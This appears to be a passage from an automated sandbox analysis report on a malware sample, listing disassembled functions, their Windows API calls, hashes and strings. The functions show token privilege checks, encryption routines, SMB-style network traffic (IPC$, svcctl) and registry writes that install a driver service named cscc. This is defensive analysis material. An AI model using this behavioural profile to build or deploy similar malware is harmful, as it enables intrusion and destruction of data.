                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                              • String ID:
                                              • API String ID: 4121633671-0
                                              • Opcode ID: 1fe11745313475f3c7f6a3d6ae11e3d3a9e894fcf5c07656fb48270ef20231cf
                                              • Instruction ID: 6bc203ec43a7f1bdb86d6f905d0aef2bb3e24b46c999ee6cabbd0b2351358b3b
                                              • Opcode Fuzzy Hash: 1fe11745313475f3c7f6a3d6ae11e3d3a9e894fcf5c07656fb48270ef20231cf
                                              • Instruction Fuzzy Hash: 1A41B5B1D00219AFDB11EFE9D884DDEFBBCFF48340B144496E61AE7210D774AA458BA0
                                              Function 04BF841D Relevance: 16.6, APIs: 11, Instructions: 78memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32(?,04BF8555,?,?), ref: 04BF8430
                                              • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04BF8555,?,?), ref: 04BF844C
                                              • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04BF8555,?,?), ref: 04BF8464
                                              • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04BF8555,?,?), ref: 04BF847D
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04BF84A3
                                              • CheckTokenMembership.ADVAPI32(?,?,?), ref: 04BF84BA
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BF84CB
                                              • FreeSid.ADVAPI32(?), ref: 04BF84D4
                                              • CloseHandle.KERNEL32(?), ref: 04BF84DD
                                              • CloseHandle.KERNEL32(?,?,?,?,04BF8555,?,?), ref: 04BF84E2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,04BF8555,?,?), ref: 04BF84E5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                              • String ID:
                                              • API String ID: 2191316301-0
                                              • Opcode ID: de4675a814809a006a11f5817453ea2662c4cd4d9eab6949a1fad0d298666b69
                                              • Instruction ID: 6d505f940cfc032753891159834e0f5df9fca0e19e8fdc7ef921176e7b31af2a
                                              • Opcode Fuzzy Hash: de4675a814809a006a11f5817453ea2662c4cd4d9eab6949a1fad0d298666b69
                                              • Instruction Fuzzy Hash: F9213B72900109BFEB10AFA4EC89EAEBB7DEF04781F004066FA0AA2150D7349E55DB71
                                              Function 04BF7CC5 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04BF79E8), ref: 04BF7CE9
                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04BF79E8), ref: 04BF7CF0
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04BF7D02
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BF7D25
                                              • GetLastError.KERNEL32(?,00000000), ref: 04BF7D2D
                                              • SetLastError.KERNEL32(?,?,00000000,?,?,?,04BF79E8), ref: 04BF7D3F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                              • String ID:
                                              • API String ID: 2365211911-0
                                              • Opcode ID: 061e4be4bd9b51e8aac1c8734da9b1a71da8ed08e8ffbb7942554cd4d2d24c71
                                              • Instruction ID: ff618a5e2d0db0bb729c128dd56e7192180a45c8fecac25dfdee3977b718e114
                                              • Opcode Fuzzy Hash: 061e4be4bd9b51e8aac1c8734da9b1a71da8ed08e8ffbb7942554cd4d2d24c71
                                              • Instruction Fuzzy Hash: 66110C75901218BFDB009FF5DC48AEFBFBCEB08750F1044A6EA09E2140D7749A599BE1
                                              Function 04BF559B Relevance: 9.1, APIs: 6, Instructions: 54encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04BF55BC
                                              • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04BF55CB
                                              • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04BF55DA
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF55EE
                                              • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF5601
                                              • LocalFree.KERNEL32(?), ref: 04BF5606
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptParam$Local$AllocFree
                                              • String ID:
                                              • API String ID: 3966954206-0
                                              • Opcode ID: 42db670e1f5381252843107971eab808f81f9760a63f4e19013add5d006798dd
                                              • Instruction ID: c5ec556fb7e6930a2f14bb40c46302aaf61f331cf4245c5b71fe8ff684ae7608
                                              • Opcode Fuzzy Hash: 42db670e1f5381252843107971eab808f81f9760a63f4e19013add5d006798dd
                                              • Instruction Fuzzy Hash: D50125B2900208BFEB119FA5DC84DAFBF7CEF44390F004466FA0AA2041D2349E54DAB0
                                              Function 04BF56D8 Relevance: 7.6, APIs: 5, Instructions: 72encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04BF5714
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 04BF571F
                                              • memcpy.MSVCRT ref: 04BF5736
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF5750
                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 04BF576E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptEncryptLocal$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 55365748-0
                                              • Opcode ID: 27ab1a90dc0b73f5f29ba46a37f15b52916268e9d22f1b451a895d3e34d390b2
                                              • Instruction ID: 36604ae5a4e7b47aa4b3e3b4a21726303106508f60f0bc242c8a91870e981b92
                                              • Opcode Fuzzy Hash: 27ab1a90dc0b73f5f29ba46a37f15b52916268e9d22f1b451a895d3e34d390b2
                                              • Instruction Fuzzy Hash: 94215E75900215FFDF219FA5DC84A9FBFADEB08750F1040A5FA09A7251D6719A14CBA0
                                              Function 04BF5780 Relevance: 6.0, APIs: 4, Instructions: 47encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04BF579E
                                              • LocalAlloc.KERNEL32(00000040,?,00000000,?,04BF5988,00000000,?,?,?,?,?,?,?,?), ref: 04BF57AD
                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04BF57C6
                                              • LocalFree.KERNEL32(00000000,?,04BF5988,00000000,?,?,?,?,?,?,?,?), ref: 04BF57D6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: 10604c6d391d6321b79775a993acf002a286f7cf3e4a9bd40bf299f55676564f
                                              • Instruction ID: 3825657e92ba421bdddb6b1db24974ded2843a423d083be6e05099011ec877ac
                                              • Opcode Fuzzy Hash: 10604c6d391d6321b79775a993acf002a286f7cf3e4a9bd40bf299f55676564f
                                              • Instruction Fuzzy Hash: 3E0169B620020DFFEB118F98DC80EAE7BADEB44754F104066FA0897200E6B1EE059B70
                                              Function 04BF6246 Relevance: 4.5, APIs: 3, Instructions: 39encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6260
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6273
                                              • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6289
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$CreateDataParam
                                              • String ID:
                                              • API String ID: 3669532303-0
                                              • Opcode ID: 5b7d39507cb4daf319d4c1ec0e3821bfd797cba1d7fec35999d19218dc875d95
                                              • Instruction ID: 234ee89dbce278ae04c16bf8cf9ed77ffb30c4479900e81a80ed35c3caa44333
                                              • Opcode Fuzzy Hash: 5b7d39507cb4daf319d4c1ec0e3821bfd797cba1d7fec35999d19218dc875d95
                                              • Instruction Fuzzy Hash: 77F0A9B5200308BFE7118FA5ED85E6B77BCFB44744B50446AF60AD7140D771AD059B20
                                              Function 04BF29A2 Relevance: 57.4, APIs: 38, Instructions: 367memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,771AF380,?,04BF4775), ref: 04BF29BF
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF29C8
                                              • GetProcessHeap.KERNEL32(00000008,00001124,?,04BF4775), ref: 04BF29DC
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF29DF
                                              • rand.MSVCRT ref: 04BF29F0
                                              • htons.WS2_32(00000050), ref: 04BF2A25
                                              • rand.MSVCRT ref: 04BF2A7E
                                              • rand.MSVCRT ref: 04BF2A96
                                              • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04BF2ABB
                                              • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04BF2AD2
                                              • rand.MSVCRT ref: 04BF2AE7
                                              • htons.WS2_32(00001120), ref: 04BF2B06
                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,04BF4775), ref: 04BF2B6A
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2B71
                                              • htons.WS2_32(0000015C), ref: 04BF2B90
                                              • rand.MSVCRT ref: 04BF2BBE
                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,04BF4775), ref: 04BF2BD2
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2BD9
                                              • htons.WS2_32(00000044), ref: 04BF2BF8
                                              • GetProcessHeap.KERNEL32(00000008,00001638,?,04BF4775), ref: 04BF2C58
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2C5F
                                              • memcpy.MSVCRT ref: 04BF2C79
                                              • memcpy.MSVCRT ref: 04BF2C90
                                              • htons.WS2_32(00000050), ref: 04BF2C9A
                                              • memcpy.MSVCRT ref: 04BF2D17
                                              • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04BF2D37
                                              • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04BF2D4F
                                              • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04BF2D86
                                              • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04BF4775), ref: 04BF2DB3
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04BF4775), ref: 04BF2DBA
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DC6
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DCD
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DD9
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DE0
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,04BF4775), ref: 04BF2DE9
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DF0
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DFB
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2E02
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                              • String ID:
                                              • API String ID: 2063504749-0
                                              • Opcode ID: 81fc4ef487607cb376e174c887547f2b1e40495943470c6a9c57ceb22f48c25b
                                              • Instruction ID: f1f4766e191f081568f19081af2a5920fcec998efef79fbbb6cd0e3c0eb0cf52
                                              • Opcode Fuzzy Hash: 81fc4ef487607cb376e174c887547f2b1e40495943470c6a9c57ceb22f48c25b
                                              • Instruction Fuzzy Hash: F5E1BF75900305EFEB14DFA4DC49BAA7BB8FF48710F10409AFA099B295E779E844CB64
                                              Function 04BF3D0D Relevance: 39.3, APIs: 26, Instructions: 326memorysleepnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,771AF380,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?), ref: 04BF3D2B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D34
                                              • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04BF3D46
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D49
                                              • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3D63
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D66
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?,?), ref: 04BF3E5B
                                              • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3E65
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3E68
                                              • rand.MSVCRT ref: 04BF3EC3
                                              • memset.MSVCRT ref: 04BF3EFC
                                                • Part of subcall function 04BF3209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF3220
                                                • Part of subcall function 04BF3209: HeapAlloc.KERNEL32(00000000,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF3227
                                                • Part of subcall function 04BF3209: htons.WS2_32(?), ref: 04BF3246
                                                • Part of subcall function 04BF3209: memcpy.MSVCRT ref: 04BF3276
                                                • Part of subcall function 04BF3209: send.WS2_32(?,00000000,?,00000000), ref: 04BF3287
                                                • Part of subcall function 04BF3209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF329A
                                                • Part of subcall function 04BF3209: HeapFree.KERNEL32(00000000), ref: 04BF32A1
                                              • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04BF3F38
                                              • htons.WS2_32(?), ref: 04BF3F5C
                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04BF3FF8
                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04BF4063
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF406E
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4075
                                              • memcpy.MSVCRT ref: 04BF408F
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04BF4269,?,00000000,?,?), ref: 04BF40A0
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40A7
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?), ref: 04BF40B6
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40B9
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF40C2
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40C5
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF40D0
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40D3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                              • String ID:
                                              • API String ID: 2208892845-0
                                              • Opcode ID: fbb6508b26b431187b0fef45500f58b3163db1c1991c44964116c06d5c7c5e8c
                                              • Instruction ID: 6aabbaa65701e8a213af0e0447eedb5487903bf581d58f739b2b62f0935c259f
                                              • Opcode Fuzzy Hash: fbb6508b26b431187b0fef45500f58b3163db1c1991c44964116c06d5c7c5e8c
                                              • Instruction Fuzzy Hash: B7D14CB0500344AFDB10DF69C884B6ABBE5FF49304F04859AFA8DDB292D779E845CB64
                                              Function 04BF13E8 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 118registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF1408
                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04BF1427
                                              • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04BF1453
                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04BF147E
                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04BF1495
                                              • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 04BF14B3
                                              • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 04BF14CB
                                              • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 04BF14E9
                                              • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04BF1501
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04BF1523
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Value$CloseOpenQuerywsprintf
                                              • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                              • API String ID: 693892761-175094307
                                              • Opcode ID: 2bbb0cff1acbae8503cccf917b70dbb49bc402334dc576fb974b2d796ccc2dc6
                                              • Instruction ID: f4bcea532bcbcf05fb3b5c230a2f2b36d136c81e1e2444cf64659e09d85fe5a5
                                              • Opcode Fuzzy Hash: 2bbb0cff1acbae8503cccf917b70dbb49bc402334dc576fb974b2d796ccc2dc6
                                              • Instruction Fuzzy Hash: 7F3162B1A4125DFAEB109F96DD45FBF7B7DEB44B44F1044A6BA05B2080E270BF089A61
                                              Function 04BF516B Relevance: 31.7, APIs: 17, Strings: 4, Instructions: 172memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF1EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF1ED2
                                                • Part of subcall function 04BF1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1EDB
                                                • Part of subcall function 04BF1EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF943A), ref: 04BF1F1F
                                                • Part of subcall function 04BF1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1F22
                                                • Part of subcall function 04BF1EB9: htons.WS2_32(?), ref: 04BF1F41
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF206D
                                                • Part of subcall function 04BF2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2076
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04BF943A), ref: 04BF209C
                                                • Part of subcall function 04BF2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF209F
                                                • Part of subcall function 04BF2054: htons.WS2_32(?), ref: 04BF20BC
                                                • Part of subcall function 04BF2054: send.WS2_32(?,00000000,?,00000000), ref: 04BF2131
                                                • Part of subcall function 04BF2054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2148
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF2168
                                                • Part of subcall function 04BF2054: HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF216F
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04BF4E76
                                                • Part of subcall function 04BF4E60: HeapAlloc.KERNEL32(00000000), ref: 04BF4E79
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF4F2A
                                                • Part of subcall function 04BF4E60: HeapFree.KERNEL32(00000000), ref: 04BF4F2D
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04BF4F32
                                                • Part of subcall function 04BF4E60: HeapFree.KERNEL32(00000000), ref: 04BF4F35
                                              • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04BF51D3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF51DC
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,00000068,771AF380,?,77735E70,?,04BF51F9,?,?,?), ref: 04BF4F56
                                                • Part of subcall function 04BF4F43: HeapAlloc.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF4F5D
                                                • Part of subcall function 04BF4F43: rand.MSVCRT ref: 04BF4F86
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,?,04BF51F9,?,00000000,?,04BF51F9,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04BF4FF7
                                                • Part of subcall function 04BF4F43: HeapFree.KERNEL32(00000000), ref: 04BF4FFE
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,00000000,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04BF51F9,?,?,?), ref: 04BF5007
